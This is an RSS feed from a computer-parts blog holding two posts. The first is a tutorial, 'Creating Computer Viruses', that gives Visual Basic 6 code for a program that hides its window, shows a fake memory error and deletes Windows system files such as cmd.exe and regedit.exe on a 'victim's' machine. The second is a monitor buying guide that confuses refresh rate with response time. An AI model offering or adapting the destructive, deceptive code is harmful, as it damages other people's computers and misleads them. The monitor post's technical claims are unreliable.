<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Huge Pedia &#187; Refresh rate</title>
	<atom:link href="http://www.hugepedia.com/category/refresh-rate/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.hugepedia.com</link>
	<description>Computer Parts!</description>
	<lastBuildDate>Tue, 07 Feb 2012 06:40:40 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Creating Computer Viruses</title>
		<link>http://www.hugepedia.com/creating-computer-viruses/</link>
		<comments>http://www.hugepedia.com/creating-computer-viruses/#comments</comments>
		<pubDate>Mon, 22 Mar 2010 09:15:53 +0000</pubDate>
		<dc:creator>hugepedia</dc:creator>
				<category><![CDATA[Refresh rate]]></category>
		<category><![CDATA[Software topic]]></category>
		<category><![CDATA[computer virus]]></category>
		<category><![CDATA[computer virus in Visual Basic 6]]></category>
		<category><![CDATA[creating a computer virus]]></category>
		<category><![CDATA[Creating a computer virus in Visual Basic 6]]></category>
		<category><![CDATA[infecting computer]]></category>

		<guid isPermaLink="false">http://www.hugepedia.com/?p=220</guid>
		<description><![CDATA[Creating a computer virus is going to be pretty hard, especially for beginners. Well, this tutorial will show you how to create a simple computer virus with only a few codes. A computer virus can be an application which deletes files from the computer, and infects your computer because it deletes files, codes, and you [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Creating a computer virus</strong> is going to be pretty hard,  especially for beginners. Well, this tutorial will show you how to <strong>create  a simple computer virus</strong> with only a few codes. A <strong>computer virus</strong> can be an application which deletes files from the computer, and  infects your computer because it deletes files, codes, and you need an <strong>Antivirus</strong> to clean your computer in order to be back as normal.</p>
<p>First, open a New Project in Visual basic, a Standard exe file. Now  it depends on how do you want your <strong>virus</strong> to work, I&#8217;m thinking  it&#8217;s better to activate a single time the opened application so that the  Main Codes to be always in order. In your project insert a Text Box, a  command button and a Timer, but we will use these later.<br />
<center><br />
<a href="http://www.hugepedia.com/wp-content/uploads/2010/03/creating-computer-viruses.jpg"><img class="alignnone size-medium wp-image-221" title="creating-computer-viruses" src="http://www.hugepedia.com/wp-content/uploads/2010/03/creating-computer-viruses-300x224.jpg" alt="" width="300" height="224" /></a><br />
</center><br />
In the project type the file you want it to delete, for example if  you want to delete the command file, then you must insert in TAB order  the following codes:</p>
<p>Private Sub Form_Load()</p>
<p>Text1.Text = &#8220;C:/Windows/System32/cmd.exe&#8221;</p>
<p>Kill Text1.Text</p>
<p>End Sub</p>
<p>When the program is run a single time, the command file will be  deleted. Now i will show you a &#8220;making&#8221; example and using the command  button. Insert the next code in the Command Button in the loaded form.  You can insert a simple text box in order to make the <strong>virus</strong> to  act faster. I inserted &#8220;A&#8221;:</p>
<p>Private Sub Form_Load()</p>
<p>Text1.Text = &#8220;C:/Windows/System32/cmd.exe&#8221;</p>
<p>A = Text1.Text</p>
<p>End Sub</p>
<p>Private Sub Command1_Click</p>
<p>Kill A</p>
<p>End Sub</p>
<p>Now you only need to press the command button a single time in the  project and the file you selected to be deleted, will be deleted. Now we  will user the Timer. If you want to Disguise your scheme then this is  the right way to do it, we will send a Fake Message Error pretending the  application has not enough memory for running, but in fact the victim  does not know that you deleted the file.</p>
<p>The scheme:</p>
<p>Private Sub Form_Load()</p>
<p>Form1.Visible = False</p>
<p>Text1.Text = &#8220;C:/Windows/System32/cmd.exe&#8221;</p>
<p>A = Text1.Text</p>
<p>Msgbox (&#8220;Runtime Error 492. Not Enough Memory.&#8221;, vbCritical, &#8220;Runtime  Error&#8221;</p>
<p>End Sub</p>
<p>Private Sub Timer1_Timer()</p>
<p>Timer1.Interval = 5000</p>
<p>Kill A</p>
<p>Timer1.Enabled = False</p>
<p>End Sub</p>
<p>At last, we made an invisible form so that it will display the false  Error Message. We set a 5 seconds gap, meaning that after 5 seconds will  delete the file, this is as simple for anyone. Ok, now we will make it a  little bit difficult if you think this was easy. How to delete more  than 1 file from the computer, and you don&#8217;t need a text box:<br />
<center><br />
<a href="http://www.hugepedia.com/wp-content/uploads/2010/03/creating-computer-viruses-2.jpg"><img class="alignnone size-medium wp-image-222" title="creating-computer-viruses-2" src="http://www.hugepedia.com/wp-content/uploads/2010/03/creating-computer-viruses-2-227x300.jpg" alt="" width="227" height="300" /></a><br />
</center><br />
In the loaded form insert the next code:</p>
<p>Private Sub Form_Load()</p>
<p>Form1.Visible = False</p>
<p>Msgbox (&#8220;Runtime Error 492. Not Enough Memory.&#8221;, vbCritical, &#8220;Runtime  Error&#8221;</p>
<p>Kill &#8220;C:/Windows/System32/cmd.exe&#8221; s</p>
<p>Kill &#8220;C:/Windows/regedit.exe&#8221;</p>
<p>End Sub</p>
<p>In the end, it will delete the command file and registry file, and I  don&#8217;t think that the victim will be as pleased as you will be. Now I  will show you the information which I believe to be your start for  creating programs, and you can test it on your own PC, just copy a file,  let&#8217;s say cmd.exe and paste it in C:/. Now insert the code, but in  &#8220;Kill&#8221; insert: Kill &#8220;C:/cmd.exe&#8221;</p>
<p>That&#8217;s about everything that you need to &#8220;kill&#8221;, and then you will  see the deleted file. Try other stuff and you&#8217;ll be a hell of a program  in short time.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.hugepedia.com/creating-computer-viruses/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>LCD Monitors Refresh Rates</title>
		<link>http://www.hugepedia.com/lcd-monitors-refresh-rates/</link>
		<comments>http://www.hugepedia.com/lcd-monitors-refresh-rates/#comments</comments>
		<pubDate>Thu, 04 Mar 2010 12:49:44 +0000</pubDate>
		<dc:creator>hugepedia</dc:creator>
				<category><![CDATA[Refresh rate]]></category>
		<category><![CDATA[5 ms]]></category>
		<category><![CDATA[Acer LCD]]></category>
		<category><![CDATA[LCD monitors refresh rates]]></category>
		<category><![CDATA[LG monitor]]></category>
		<category><![CDATA[response time]]></category>

		<guid isPermaLink="false">http://www.hugepedia.com/?p=53</guid>
		<description><![CDATA[Everyone has heard of LCD &#8211; liquid crystal display &#8211; monitors. Yea it&#8217;s that fancy flat screen monitor that fits perfectly everywhere, on your desk, on the wall, on the table, it&#8217;s slimmer and lighter than the old CRT &#8211; cathode ray tube &#8211; monitors, they come in different colors: blue, green, gray, white, black, [...]]]></description>
			<content:encoded><![CDATA[<p>Everyone has heard of LCD &#8211; liquid crystal display &#8211; monitors. Yea  it&#8217;s that fancy flat screen monitor that fits perfectly everywhere, on  your desk, on the wall, on the table, it&#8217;s slimmer and lighter than the  old CRT &#8211; cathode ray tube &#8211; monitors, they come in different colors:  blue, green, gray, white, black, olive, etc., different sizes depending  on the screen&#8217;s diagonal: 15 inches, 17 inches, 19 inches, up to 30+  inches. But we also see in their description something about it&#8217;s  refresh rate (Hz) or response time (ms): 10 ms, 8 ms, 5 ms, 2 ms; yea we  know smaller refresh rate means better display, but why ? What is <strong>the  refresh rate of an LCD monitor </strong>? Well it signifies the number of  times in a second that the display hardware draws the data. While the  cathode ray tube monitors use the same technique for both illumination  and imaging, the LCDs have a separate backlight to illuminate the image  generated by the liquid crystals.</p>
<p>There are all kinds of brands for the LCD monitors like: Acer, ASUS,  Benq, Dell, Fujitsu Siemens, Hanns.G, Horizon, HP, Lenovo, LG, NEC,  Proview, RPC, Samsung, Viewsonic, Viewstar, Yuraku and so on; every  brand has each monitor with different refresh rate in order to satisfy  it&#8217;s customers.<br />
<center><br />
<a href="http://www.hugepedia.com/wp-content/uploads/2010/03/lcd-monitors-refresh-rates.jpg"><img class="alignnone size-full wp-image-54" title="lcd-monitors-refresh-rates" src="http://www.hugepedia.com/wp-content/uploads/2010/03/lcd-monitors-refresh-rates.jpg" alt="" width="290" height="290" /></a><br />
</center><br />
But the real thing is, that it doesn&#8217;t matter if the refresh rate of a  monitor is lower or higher because you&#8217;ll never going to be able to see  the difference, because you can not see the refresh with the clean eye,  but what you are going to notice is the color contrast which differ  from one screen to another. So don&#8217;t plan to buy an LCD monitor with a  lower refresh rate just because you want to have your images refresh  more often. Our advice to you is to buy an LCD monitor from one of the  famous brands, we suggest you don&#8217;t throw your money into some no-named  brand&#8217;s pocket just because they had lower prices. Not all the time, but  sometimes the higher the prices lead to higher performances and a  longer lifetime for the product.<br />
<center><br />
<a href="http://www.hugepedia.com/wp-content/uploads/2010/03/lcd-monitors-refresh-rates-2.jpg"><img class="alignnone size-medium wp-image-55" title="lcd-monitors-refresh-rates-2" src="http://www.hugepedia.com/wp-content/uploads/2010/03/lcd-monitors-refresh-rates-2-300x231.jpg" alt="" width="300" height="231" /></a><br />
</center><br />
Here are some of the monitors worth buying at low prices:</p>
<p>- <span style="text-decoration: underline;">Acer H233H</span> 23 inch Wide screen Flat Panel LCD Monitor : 5 ms  response time, for <strong>$189.99</strong></p>
<p>- <span style="text-decoration: underline;">Acer X203H</span> 20 inch Wide screen Flat Panel LCD Monitor : 5 ms  response time, for <strong>$119.99</strong></p>
<p>- <span style="text-decoration: underline;">ASUS VE205N</span> 20 inch Wide screen Flat Panel TFT-LCD Monitor :  5 ms response time, for <strong>$159.99</strong></p>
<p>- <span style="text-decoration: underline;">Compaq Q2009</span> 20 inch Wide screen Flat Panel TFT-LCD Monitor :  5 ms response time, for <strong>$139.99</strong></p>
<p>- <span style="text-decoration: underline;">Compaq Q1859</span> 18.5 inch Wide screen Flat Panel LCD Monitor : 5  ms response time, for <strong>$129.99</strong></p>
<p>- <span style="text-decoration: underline;">Dell IN1910N</span> 18.5 inch Wide screen Flat Panel LCD Monitor : 5  ms response time, for <strong>$119.99</strong></p>
<p>- <span style="text-decoration: underline;">HP W1858</span> 18.5 inch Wide screen Flat Panel HD LCD Monitor : 5  ms response time, for <strong>$139.99</strong></p>
<p>- <span style="text-decoration: underline;">HP 2009M</span> 20 inch Wide screen Flat Panel TFT-LCD HD Monitor :  5 ms response time, for <strong>$159.99</strong></p>
<p>- <span style="text-decoration: underline;">LG W1943TB-PF</span> 18.5 inch Wide screen Flat Panel LCD HD  Monitor : 5 ms response time, for <strong>$119.99</strong></p>
<p>- <span style="text-decoration: underline;">LG W2043T</span> 20 inch Wide screen Flat Panel LCD Monitor : 5 ms  response time, for <strong>$149.99</strong></p>
<p>So these are some of the best priced <strong>LCD monitors with good  refresh rate</strong>. Remember, the refresh rate isn&#8217;t really literally  noticeable for the naked eye to see, but the color contrast is.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.hugepedia.com/lcd-monitors-refresh-rates/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

